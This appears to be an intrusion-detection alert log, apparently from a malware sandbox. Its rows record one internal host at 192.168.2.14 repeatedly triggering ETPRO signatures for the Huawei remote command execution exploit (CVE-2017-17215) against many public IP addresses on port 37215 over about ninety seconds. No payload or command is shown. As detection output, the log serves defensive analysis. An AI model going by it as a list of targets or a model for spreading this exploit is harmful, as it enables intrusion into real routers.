                                                    07/10/24-08:27:28.162130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3498237215192.168.2.14197.110.189.251
                                                    07/10/24-08:26:33.245914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3426437215192.168.2.1441.243.146.59
                                                    07/10/24-08:26:59.662577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5751837215192.168.2.1432.1.206.148
                                                    07/10/24-08:26:11.116363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5424237215192.168.2.14164.106.102.194
                                                    07/10/24-08:26:48.009265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6046637215192.168.2.14113.80.184.254
                                                    07/10/24-08:26:51.939250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5185637215192.168.2.1441.2.198.212
                                                    07/10/24-08:26:11.093817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5142837215192.168.2.14195.37.174.200
                                                    07/10/24-08:26:43.662238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5907037215192.168.2.14197.172.192.5
                                                    07/10/24-08:26:47.867621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3909837215192.168.2.1441.250.160.110
                                                    07/10/24-08:26:55.366242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892237215192.168.2.14199.179.57.142
                                                    07/10/24-08:27:32.610394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5389037215192.168.2.1441.172.183.199
                                                    07/10/24-08:27:30.523582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5492437215192.168.2.14157.234.65.102
                                                    07/10/24-08:26:36.368939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5180437215192.168.2.1450.162.145.88
                                                    07/10/24-08:27:07.350674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3998837215192.168.2.1441.178.95.171
                                                    07/10/24-08:26:20.155412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5485237215192.168.2.14157.99.29.50
                                                    07/10/24-08:26:43.551823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4898037215192.168.2.1441.50.211.217
                                                    07/10/24-08:26:18.030544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5082837215192.168.2.14197.230.240.229
                                                    07/10/24-08:27:20.488925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4024037215192.168.2.14157.211.225.126
                                                    07/10/24-08:26:42.154105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4340637215192.168.2.14107.192.155.240
                                                    07/10/24-08:26:57.684476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4824637215192.168.2.14112.179.12.206
                                                    07/10/24-08:27:32.569542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4026037215192.168.2.14197.162.238.254
                                                    07/10/24-08:26:14.626049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3495637215192.168.2.14157.118.78.26
                                                    07/10/24-08:26:18.037412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3737437215192.168.2.14135.138.198.88
                                                    07/10/24-08:27:31.555849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4936437215192.168.2.14197.119.139.198
                                                    07/10/24-08:27:22.800658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3281637215192.168.2.14135.80.226.41
                                                    07/10/24-08:26:29.805912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5428437215192.168.2.14197.111.40.134
                                                    07/10/24-08:27:02.998271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5514637215192.168.2.14146.223.62.147
                                                    07/10/24-08:27:10.632992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5686437215192.168.2.1441.43.151.132
                                                    07/10/24-08:26:59.640486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3775637215192.168.2.14157.197.203.20
                                                    07/10/24-08:26:42.404259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3710437215192.168.2.1451.21.129.41
                                                    07/10/24-08:26:15.833286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4482837215192.168.2.1441.215.67.204
                                                    07/10/24-08:26:13.766150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257637215192.168.2.14197.126.237.60
                                                    07/10/24-08:27:22.838932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4794437215192.168.2.14217.27.139.235
                                                    07/10/24-08:26:55.364667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3905037215192.168.2.14197.2.26.224
                                                    07/10/24-08:26:57.564039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4505437215192.168.2.1441.138.225.158
                                                    07/10/24-08:26:43.584694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3386837215192.168.2.14157.240.183.76
                                                    07/10/24-08:26:29.839757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3937037215192.168.2.1441.243.115.128
                                                    07/10/24-08:26:52.050509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473637215192.168.2.1441.94.117.0
                                                    07/10/24-08:27:28.064051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4088437215192.168.2.1441.115.141.65
                                                    07/10/24-08:26:15.870897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6076237215192.168.2.1412.186.245.152
                                                    07/10/24-08:26:45.609280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942837215192.168.2.1441.66.94.68
                                                    07/10/24-08:26:57.641730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654837215192.168.2.14129.26.112.154
                                                    07/10/24-08:27:30.454627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5756637215192.168.2.1441.168.255.41
                                                    07/10/24-08:26:55.322726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4743437215192.168.2.1441.120.241.39
                                                    07/10/24-08:27:23.902387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6021637215192.168.2.1441.238.196.251
                                                    07/10/24-08:26:11.205832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575237215192.168.2.1496.209.118.195
                                                    07/10/24-08:26:31.059719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5020837215192.168.2.14184.160.93.248
                                                    07/10/24-08:27:05.102101TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4500437215192.168.2.14121.203.122.212
                                                    07/10/24-08:26:55.360026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4764437215192.168.2.1441.69.227.21
                                                    07/10/24-08:26:48.026020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3375437215192.168.2.14197.232.142.73
                                                    07/10/24-08:27:02.692447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4150637215192.168.2.1441.61.26.153
                                                    07/10/24-08:27:08.450568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3649237215192.168.2.1441.168.210.18
                                                    07/10/24-08:27:20.480155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5324637215192.168.2.14197.26.167.2
                                                    07/10/24-08:27:14.835565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5540837215192.168.2.1441.95.172.25
                                                    07/10/24-08:26:38.609336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3577237215192.168.2.14156.103.114.190
                                                    07/10/24-08:27:07.372666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5058637215192.168.2.1424.159.188.110
                                                    07/10/24-08:27:07.362991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5784637215192.168.2.14157.33.183.72
                                                    07/10/24-08:27:14.825720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5241237215192.168.2.14157.168.48.95
                                                    07/10/24-08:27:10.558738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4586037215192.168.2.1441.10.188.133
                                                    07/10/24-08:27:27.143862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3880837215192.168.2.14197.24.43.210
                                                    07/10/24-08:26:26.579730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5433437215192.168.2.14174.146.80.189
                                                    07/10/24-08:27:24.839562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4122037215192.168.2.1441.163.208.200
                                                    07/10/24-08:27:05.181070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5294037215192.168.2.14197.183.52.122
                                                    07/10/24-08:26:57.536379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3780437215192.168.2.14197.140.172.228
                                                    07/10/24-08:27:17.084345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5951637215192.168.2.14203.106.221.148
                                                    07/10/24-08:26:26.603230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5161037215192.168.2.14176.13.121.139
                                                    07/10/24-08:26:22.295536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5988637215192.168.2.14157.192.74.50
                                                    07/10/24-08:26:28.750932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626437215192.168.2.14197.182.12.171
                                                    07/10/24-08:26:25.463827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809037215192.168.2.14157.111.55.191
                                                    07/10/24-08:26:31.090625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5676437215192.168.2.1441.51.239.210
                                                    07/10/24-08:26:38.596556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3839437215192.168.2.14157.249.13.225
                                                    07/10/24-08:27:32.583920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439237215192.168.2.14197.18.179.160
                                                    07/10/24-08:26:11.617783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4878637215192.168.2.14197.87.221.120
                                                    07/10/24-08:27:27.161744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3766637215192.168.2.14102.77.132.31
                                                    07/10/24-08:27:28.085115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5656837215192.168.2.14157.248.33.110
                                                    07/10/24-08:27:11.503396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3548237215192.168.2.1446.175.36.202
                                                    07/10/24-08:26:22.240891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5657637215192.168.2.1441.186.216.48
                                                    07/10/24-08:27:19.182366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4007237215192.168.2.14210.39.247.137
                                                    07/10/24-08:26:42.381033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5783637215192.168.2.1493.109.26.132
                                                    07/10/24-08:27:32.553741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3309437215192.168.2.1441.159.38.43
                                                    07/10/24-08:27:20.451550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5802637215192.168.2.14157.16.163.172
                                                    07/10/24-08:26:33.217527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5175837215192.168.2.14157.219.142.31
                                                    07/10/24-08:26:15.874379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4552037215192.168.2.1441.113.245.177
                                                    07/10/24-08:26:25.486386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4815237215192.168.2.14197.198.238.68
                                                    07/10/24-08:27:14.879570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3585037215192.168.2.1441.189.33.184
                                                    07/10/24-08:26:14.792244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543437215192.168.2.1463.136.4.159
                                                    07/10/24-08:27:22.535302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4992437215192.168.2.14197.40.234.149
                                                    07/10/24-08:26:13.798574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4101037215192.168.2.1441.60.51.46
                                                    07/10/24-08:26:31.071215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3413237215192.168.2.1441.153.84.123
                                                    07/10/24-08:26:25.474823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495037215192.168.2.14197.41.209.1
                                                    07/10/24-08:27:02.879957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515637215192.168.2.1441.102.115.145
                                                    07/10/24-08:27:31.463838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4729037215192.168.2.14197.26.141.209
                                                    07/10/24-08:27:13.998046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3915037215192.168.2.14157.104.97.136
                                                    07/10/24-08:26:53.182396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5037837215192.168.2.14197.14.184.16
                                                    07/10/24-08:26:11.093206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4653037215192.168.2.14197.48.229.175
                                                    07/10/24-08:27:02.870791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4037437215192.168.2.14148.109.107.126
                                                    07/10/24-08:27:23.781687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695837215192.168.2.1441.255.133.108
                                                    07/10/24-08:26:29.876812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4947437215192.168.2.14157.90.38.9
                                                    07/10/24-08:26:53.192940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4601637215192.168.2.14157.31.164.119
                                                    07/10/24-08:27:23.893892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4169237215192.168.2.1460.3.143.177
                                                    07/10/24-08:27:02.776043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079637215192.168.2.1481.195.13.54
                                                    07/10/24-08:27:24.954167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4291237215192.168.2.1441.192.56.252
                                                    07/10/24-08:26:23.347149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5178237215192.168.2.1441.234.61.77
                                                    07/10/24-08:26:28.761940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4881037215192.168.2.14157.73.20.146
                                                    07/10/24-08:26:18.027380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412237215192.168.2.14157.241.227.83
                                                    07/10/24-08:27:22.906366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4870037215192.168.2.14199.54.217.95
                                                    07/10/24-08:26:31.054744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5170637215192.168.2.14157.207.151.118
                                                    07/10/24-08:26:11.588722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239837215192.168.2.1441.32.89.88
                                                    07/10/24-08:27:14.863402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3364237215192.168.2.1425.50.218.45
                                                    07/10/24-08:27:22.771022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4023037215192.168.2.14158.62.226.125
                                                    07/10/24-08:26:20.190530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5564837215192.168.2.1441.235.101.163
                                                    07/10/24-08:27:28.154911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3353837215192.168.2.14197.23.186.51
                                                    07/10/24-08:26:33.260181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4966837215192.168.2.14143.133.59.51
                                                    07/10/24-08:26:42.341991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3878637215192.168.2.1462.157.21.180
                                                    07/10/24-08:26:59.771792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5681437215192.168.2.14157.157.132.87
                                                    07/10/24-08:26:38.559179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4980637215192.168.2.14197.75.59.75
                                                    07/10/24-08:27:31.514336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4474037215192.168.2.14157.195.18.139
                                                    07/10/24-08:26:23.356000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3401437215192.168.2.14197.238.54.72
                                                    07/10/24-08:26:55.442077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3894437215192.168.2.1441.164.75.177
                                                    07/10/24-08:27:13.848645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5283237215192.168.2.1441.222.229.225
                                                    07/10/24-08:27:05.148385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4305637215192.168.2.1441.21.224.226
                                                    07/10/24-08:27:33.925119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4530837215192.168.2.1441.80.222.46
                                                    07/10/24-08:26:38.611968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714637215192.168.2.1441.67.193.119
                                                    07/10/24-08:26:59.602276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703837215192.168.2.14197.200.42.152
                                                    07/10/24-08:27:19.157761TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913237215192.168.2.14197.245.92.198
                                                    07/10/24-08:27:20.483552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5068437215192.168.2.14161.215.183.244
                                                    07/10/24-08:27:31.483215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5897637215192.168.2.1441.45.148.22
                                                    07/10/24-08:26:20.137908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3645637215192.168.2.1461.112.8.74
                                                    07/10/24-08:26:43.831201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414037215192.168.2.1439.112.13.210
                                                    07/10/24-08:26:26.581833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4959437215192.168.2.14197.51.246.85
                                                    07/10/24-08:26:52.005613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5330237215192.168.2.14103.174.215.10
                                                    07/10/24-08:27:11.555900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4761037215192.168.2.1441.109.138.95
                                                    07/10/24-08:26:34.236926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5598637215192.168.2.14157.65.58.15
                                                    07/10/24-08:27:24.986778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4753037215192.168.2.14152.54.36.181
                                                    07/10/24-08:26:17.999668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5687637215192.168.2.1425.84.242.238
                                                    07/10/24-08:26:11.562069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3440237215192.168.2.1441.105.18.185
                                                    07/10/24-08:26:20.140373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3854237215192.168.2.14197.32.131.149
                                                    07/10/24-08:26:29.882754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5038437215192.168.2.1441.151.176.103
                                                    07/10/24-08:27:19.151006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586437215192.168.2.14124.50.32.183
                                                    07/10/24-08:26:28.763825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3795837215192.168.2.14197.91.223.211
                                                    07/10/24-08:27:08.455887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4598237215192.168.2.14157.219.178.161
                                                    07/10/24-08:26:59.691821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3878437215192.168.2.1441.27.102.168
                                                    07/10/24-08:26:41.413310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923837215192.168.2.14157.24.86.235
                                                    07/10/24-08:27:22.920662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3917437215192.168.2.14157.32.35.177
                                                    07/10/24-08:27:23.503899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3510437215192.168.2.1441.219.201.197
                                                    07/10/24-08:27:10.635784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4525437215192.168.2.1497.212.64.28
                                                    07/10/24-08:27:32.569954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4507637215192.168.2.14157.163.221.97
                                                    07/10/24-08:26:28.777309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4188637215192.168.2.14157.203.100.100
                                                    07/10/24-08:27:24.948023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5036037215192.168.2.14117.235.226.130
                                                    07/10/24-08:26:14.819309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717237215192.168.2.14176.6.162.225
                                                    07/10/24-08:26:20.168869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3371237215192.168.2.14157.240.201.45
                                                    07/10/24-08:27:28.049111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4777237215192.168.2.14197.30.156.16
                                                    07/10/24-08:27:33.811617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5871837215192.168.2.14197.230.217.156
                                                    07/10/24-08:26:17.930336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3610837215192.168.2.1441.147.127.234
                                                    07/10/24-08:26:45.661984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5807837215192.168.2.14134.145.128.126
                                                    07/10/24-08:27:14.859922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6082637215192.168.2.14197.72.196.6
                                                    07/10/24-08:26:11.541811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239637215192.168.2.14157.33.128.64
                                                    07/10/24-08:26:17.956577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4777437215192.168.2.14197.98.185.93
                                                    07/10/24-08:26:31.065824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4206437215192.168.2.1441.24.126.126
                                                    07/10/24-08:27:08.350346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825037215192.168.2.1441.62.179.81
                                                    07/10/24-08:27:02.791208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3303637215192.168.2.14191.114.31.28
                                                    07/10/24-08:27:08.373070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5196437215192.168.2.14157.124.180.157
                                                    07/10/24-08:27:19.167062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5522437215192.168.2.14157.126.194.112
                                                    07/10/24-08:26:36.416571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5616837215192.168.2.14197.236.2.245
                                                    07/10/24-08:27:32.606203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5198237215192.168.2.1441.103.248.143
                                                    07/10/24-08:26:53.177633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825637215192.168.2.14197.0.175.140
                                                    07/10/24-08:26:53.191310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5525837215192.168.2.14221.0.25.221
                                                    07/10/24-08:26:38.620224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5651037215192.168.2.14167.53.80.22
                                                    07/10/24-08:27:13.848645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6058037215192.168.2.1441.142.252.207
                                                    07/10/24-08:26:57.660601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3545637215192.168.2.14157.51.98.214
                                                    07/10/24-08:27:24.951941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4743437215192.168.2.14157.222.189.203
                                                    07/10/24-08:26:36.409717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5986837215192.168.2.14157.197.114.141
                                                    07/10/24-08:27:03.001228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5154637215192.168.2.14157.93.50.190
                                                    07/10/24-08:27:30.532382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4099037215192.168.2.14157.113.205.32
                                                    07/10/24-08:27:23.457605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805637215192.168.2.1497.17.74.83
                                                    07/10/24-08:27:07.276755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4417237215192.168.2.1441.123.108.150
                                                    07/10/24-08:27:11.520220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5741837215192.168.2.14197.45.97.70
                                                    07/10/24-08:27:22.540991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3719837215192.168.2.14157.21.58.63
                                                    07/10/24-08:26:36.406451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3545637215192.168.2.14157.124.237.216
                                                    07/10/24-08:27:30.538484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176037215192.168.2.1441.28.184.189
                                                    07/10/24-08:27:22.548548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4532237215192.168.2.1441.150.132.25
                                                    07/10/24-08:27:07.333954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3400037215192.168.2.14191.159.36.137
                                                    07/10/24-08:26:25.505039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4881037215192.168.2.1441.60.17.74
                                                    07/10/24-08:27:30.511360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4792437215192.168.2.14197.180.68.200
                                                    07/10/24-08:26:33.256885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5865837215192.168.2.1441.141.195.205
